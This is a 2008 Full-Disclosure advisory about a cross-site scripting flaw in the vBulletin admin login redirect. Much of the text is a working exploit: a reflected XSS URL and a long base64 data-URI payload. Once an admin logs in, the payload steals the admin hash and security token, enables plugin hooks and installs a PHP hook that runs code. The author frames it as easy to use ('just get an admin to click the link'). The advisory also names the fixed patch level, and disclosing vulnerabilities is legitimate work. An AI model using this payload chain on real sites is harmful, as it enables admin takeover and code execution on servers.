====================================================================== Advisory : Exploit for vBulletin "obscure" XSS Release Date : June 13th 2008 Application : vBulletin Version : vBulletin 3.7.1 and lower, vBulletin 3.6.10 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors : Jessica Hope (jessicasaulhope@googlemail.com) ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging. ======================================================================= Discussion vBulletin released PL1 for their 3.7.1 and 3.6.10 versions of vBulletin: http://www.vbulletin.com/forum/showthread.php?t=274882 In the above topic they try to pass off the XSS as difficult to exploit, with low exposure and damage. This advisory is here to detail what the XSS is and how wrong Jelsoft are for assuming that XSS is harmless. First, the discussion of exactly what the exploit is. The XSS in question exists on the login page for the ACP (admin control panel). The login script takes a redirect parameter that lacks sanitation, allowing a rather easy XSS: http://localhost/vB3/admincp/index.php?redirect={XSS} Yes, here goes the obscure. What is even better is that the exploit will work outright if the admin is already logged in; if the admin is not, they will be required to log in. If you Base64-encode your attack vector using the data: URI scheme, the XSS survives the login request and activates after the admin is logged in. A simple example of the above: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K Now to address the quote "potential for exposure and damage is limited". Clearly Jelsoft have never seen what one can do with an XSS. In this case you have an unlimited and unaltered XSS space, so you're free to invoke some AJAX and have fun. Just to give ideas on how this could turn into something larger, vBulletin has hooks that operate using eval(), and new hooks can be added via the ACP itself. It is trivial to write some JS that not only enables hooks but also inserts a nice RFI hook. Here's one using the data URI: data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv O3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K The above will survive a login prompt. It will then, once executed, proceed to parse one of the ACP pages and extract the admin hash and token, then it will enable hooks and add one that executes phpinfo(). In order to exploit, just get an admin to click the link. It's easier than Jelsoft would expect... ======================================================================= Solution Per usual, update to 3.7.1 PL1 or 3.6.10 PL1 For the vendor, however, the solution to such things in the future is to never call an exploit obscure, and never write "the potential for exposure and damage is limited" when talking about an XSS. Above all, give credit where credit is due, for there's no quicker way to piss someone off than to not give credit. If the above was due to your PR department, then ignore them next time, for handling exploits with PR is never a good idea. ======================================================================= _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/